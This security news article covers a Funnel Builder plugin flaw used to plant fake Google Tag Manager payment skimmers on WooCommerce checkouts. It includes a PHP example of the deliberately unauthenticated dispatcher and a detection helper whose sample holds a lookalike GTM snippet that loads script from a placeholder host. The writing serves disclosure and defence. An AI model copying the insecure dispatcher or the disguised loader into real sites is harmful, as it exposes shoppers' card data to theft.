Funnel Builder Flaw Enables WooCommerce Checkout Skimming Attack
A critical Funnel Builder plugin vulnerability allowed attackers to inject payment skimmers into WooCommerce checkout pages. The flaw affected over 40,000 stores but has been patched with automatic updates rolled out.
A serious security flaw in the Funnel Builder plugin for WordPress has been actively exploited to steal payment information from WooCommerce stores. Attackers used the vulnerability to inject malicious code into checkout pages, potentially compromising customer credit card data.
The issue affects more than 40,000 WooCommerce stores that use Funnel Builder. However, the plugin developer FunnelKit has released a patch and worked with WordPress.org to automatically update vulnerable installations.
How the Attack Works
According to Sansec, a Dutch e-commerce security company, the vulnerability allows unauthenticated attackers to inject arbitrary JavaScript into checkout pages. The flaw impacts all versions of Funnel Builder before 3.15.0.3.
The attack method is particularly sneaky. Bad actors plant fake Google Tag Manager scripts into the plugin’s External Scripts setting. These scripts look like normal analytics code sitting alongside legitimate tracking tags. However, they actually load a payment skimmer designed to steal sensitive information.
The stolen data includes credit card numbers, CVV codes, and billing addresses. Everything a customer enters during checkout becomes vulnerable to theft.
The Technical Breakdown
The root cause lies in how older versions of Funnel Builder handle requests. The plugin includes a publicly exposed checkout endpoint that processes incoming requests. This endpoint chooses which internal method to run based on the request.
Unfortunately, older versions never verified the caller’s permissions. They also did not limit which methods could be invoked. This created a significant security gap.
Attackers exploited this loophole by sending unauthenticated requests. These requests reached an internal method that writes data directly into the plugin’s global settings, with no verification required.
Once attackers injected their malicious code, it appeared on every Funnel Builder checkout page. The planted script tags triggered on every checkout transaction across affected WordPress sites.
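The dispatch pattern described above, shown as an added illustration with hypothetical WordPress code (not FunnelKit's): a request-driven method dispatcher before and after hardening with an action allowlist, a nonce, and a capability check. The class, option and nonce names are placeholders.

```php
<?php
// Added illustration of the dispatch flaw described above; hypothetical code,
// not FunnelKit's. Shows a request-driven method dispatcher before and after hardening.

// BEFORE: the request names the internal method, and nothing checks who is calling
// or which methods may be reached, so a settings writer is exposed to any visitor.
class Vulnerable_Checkout_Endpoint {
    public function handle_request() {
        $method = isset( $_REQUEST['type'] ) ? (string) $_REQUEST['type'] : '';
        if ( method_exists( $this, $method ) ) {
            $this->$method();   // 'update_global_settings' is reachable unauthenticated
        }
        wp_die();
    }
    private function update_global_settings() {
        // Hypothetical option name; writes request data straight into wp_options.
        update_option( 'hypothetical_plugin_settings', wp_unslash( $_POST['settings'] ?? [] ) );
    }
}

// AFTER: an explicit allowlist of reachable actions, split by privilege level,
// plus a nonce and capability check before anything that writes settings.
class Hardened_Checkout_Endpoint {
    private const PUBLIC_ACTIONS = [ 'get_shipping_rates', 'apply_coupon' ];
    private const ADMIN_ACTIONS  = [ 'update_global_settings' ];

    public function handle_request() {
        $method = sanitize_key( $_REQUEST['type'] ?? '' );

        if ( in_array( $method, self::ADMIN_ACTIONS, true ) ) {
            // Nonce must be issued to the admin page via wp_create_nonce( 'hypothetical_plugin_admin' ).
            check_ajax_referer( 'hypothetical_plugin_admin', 'nonce' ); // dies on a bad nonce
            if ( ! current_user_can( 'manage_options' ) ) {
                wp_send_json_error( 'forbidden', 403 );
            }
        } elseif ( ! in_array( $method, self::PUBLIC_ACTIONS, true ) ) {
            wp_send_json_error( 'unknown action', 400 ); // never dispatch arbitrary names
        }
        $this->$method();
        wp_die();
    }

    private function get_shipping_rates() { /* front-end, read-only */ }
    private function apply_coupon()       { /* front-end, acts on the visitor's own cart */ }

    private function update_global_settings() {
        // Sanitize each field as the feature requires; plain-text fields shown here.
        $settings = (array) wp_unslash( $_POST['settings'] ?? [] );
        update_option( 'hypothetical_plugin_settings', array_map( 'sanitize_text_field', $settings ) );
    }
}
```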
Real-World Attack Details
Sansec observed at least one case where attackers disguised their payload as a Google Tag Manager loader. This fake GTM code launched JavaScript from a remote domain controlled by the attackers.
The malicious script then established a WebSocket connection to the attacker’s command-and-control server. From there, it retrieved a customized skimmer tailored specifically to the victim’s storefront.
This approach is part of a recurring Magecart pattern. Security reviewers often skim past code that looks like familiar tracking tags. Therefore, disguising skimmers as Google Analytics or Tag Manager code helps them avoid detection.
Limited Impact Thanks to Quick Response
FunnelKit responded quickly after the first report. The company patched and released a fix within 36 hours. Additionally, they worked with the WordPress.org plugin team to automatically update existing installations.
The company also backported the fix to all earlier versions. They blocked known attacker domains at the DNS level to neutralize the attack vector completely.
According to FunnelKit, the overall impact appears limited. During the nine days following disclosure, monitoring covered more than 1,300 sites. Only three showed signs of compromise before mitigations took effect.
What You Need to Do
If you run a WooCommerce store with Funnel Builder, take these steps immediately. First, verify that your plugin has been updated to version 3.15.0.3 or later. Most sites should have received the automatic update through WordPress.org.
Next, review your settings carefully. Navigate to Settings > Checkout > External Scripts in your WordPress dashboard. Look for anything unfamiliar or suspicious. Remove any scripts you did not intentionally add.
Pay special attention to anything that looks like Google Tag Manager or Google Analytics code. While legitimate tracking scripts are common, attackers specifically disguise malicious code to look like these familiar tools.
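A review helper for the External Scripts check above, added here as an example and not part of Funnel Builder. It assumes the setting's value is available as a raw HTML string (for example, copied out of the dashboard) and flags script tags whose host is not on an allowlist, including inline snippets that look like Google Tag Manager but reference some other host; the function name, sample value and placeholder domain are constructed.

```php
<?php
// Added review helper, not part of Funnel Builder: lists <script> tags in a
// settings fragment whose external host is not on an allowlist, and inline
// snippets that look like Google Tag Manager but reference some other host.
// Assumes the External Scripts value is available as a raw HTML string.
function hypothetical_flag_external_scripts( string $html, array $allowed_hosts ): array {
    $flags = [];
    $dom   = new DOMDocument();
    libxml_use_internal_errors( true );                 // fragments are rarely well-formed
    $dom->loadHTML( '<div>' . $html . '</div>' );
    libxml_clear_errors();

    foreach ( $dom->getElementsByTagName( 'script' ) as $i => $script ) {
        $src = $script->getAttribute( 'src' );
        if ( $src !== '' ) {
            $host = strtolower( (string) parse_url( $src, PHP_URL_HOST ) );
            if ( $host === '' ) {
                $flags[] = "script #$i uses a relative src ($src); confirm it is your own file";
            } elseif ( ! in_array( $host, $allowed_hosts, true ) ) {
                $flags[] = "script #$i loads from unlisted host '$host'";
            }
            continue;
        }
        // Inline snippet: if it looks like a GTM/analytics loader, every host it
        // mentions should be one you recognise; a lookalike points elsewhere.
        $body = $script->textContent;
        if ( preg_match( '/googletagmanager|gtm\.js|dataLayer|gtag\(/i', $body ) ) {
            preg_match_all( '#https?://([^/\'"\s)]+)#i', $body, $m );
            foreach ( array_unique( array_map( 'strtolower', $m[1] ) ) as $host ) {
                if ( ! in_array( $host, $allowed_hosts, true ) ) {
                    $flags[] = "inline GTM-style snippet #$i references unlisted host '$host'";
                }
            }
        }
    }
    return $flags;
}

// Constructed sample: a genuine-looking gtag loader plus a lookalike that pulls
// its script from a non-Google host (placeholder domain, not a real indicator).
$sample = <<<'HTML'
<script async src="https://www.googletagmanager.com/gtag/js?id=G-PLACEHOLDER"></script>
<script>/* GTM */ window.dataLayer = window.dataLayer || [];
var j = document.createElement('script'); j.src = 'https://gtm-lookalike.example.invalid/gtm.js';
document.head.appendChild(j);</script>
HTML;
print_r( hypothetical_flag_external_scripts( $sample, [ 'www.googletagmanager.com', 'www.google-analytics.com' ] ) );
```

Only the second snippet is reported, because the first loads from an allowlisted Google host; extend the allowlist with any other tag vendors you have deliberately added.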
Broader Security Context
This incident highlights ongoing challenges in WordPress security. Just weeks earlier, Sucuri detailed a campaign targeting Joomla websites with backdoors. Those attacks used heavily obfuscated PHP code to contact command-and-control servers.
The Joomla attacks served spammy content to visitors and search engines without the site owner's knowledge. Attackers leverage the compromised site's reputation to distribute spam. The remote loader approach allows attackers to change a compromised website's behavior at any time.
These attacks share common characteristics. Both use legitimate-looking code to avoid detection. Both establish connections to remote servers for ongoing control. Both demonstrate how attackers continuously adapt their techniques.
Protection Going Forward
The Funnel Builder vulnerability has been patched and the active exploitation path closed. Stores running version 3.15.0.3 or later are no longer vulnerable to this specific issue.
However, this incident serves as an important reminder. Regular security monitoring remains essential for WooCommerce stores. Review your installed plugins regularly. Keep everything updated to the latest versions.
Consider implementing additional security measures. Use a web application firewall designed for WordPress. Monitor your checkout pages for unexpected code. Review External Scripts settings periodically as part of routine maintenance.
Most importantly, stay informed about security issues affecting your platform. Subscribe to security bulletins from your plugin developers. Follow WordPress security news sources that filter technical information into actionable guidance.
Key Takeaways
- The flaw impacts all versions of Funnel Builder before 3.15.0.3. The attack method is particularly sneaky.
- This created a significant security gap. Attackers exploited this loophole by sending unauthenticated requests.
- The company patched and released a fix within 36 hours.
- First, verify that your plugin has been updated to version 3.15.0.3 or later.
- Stores running version 3.15.0.3 or later are no longer vulnerable to this specific issue. However, this incident serves as an important reminder.
Original Source: thehackernews.com
Sources
- Funnel Builder Flaw Exploited to Enable WooCommerce Checkout Skimming — thehackernews.com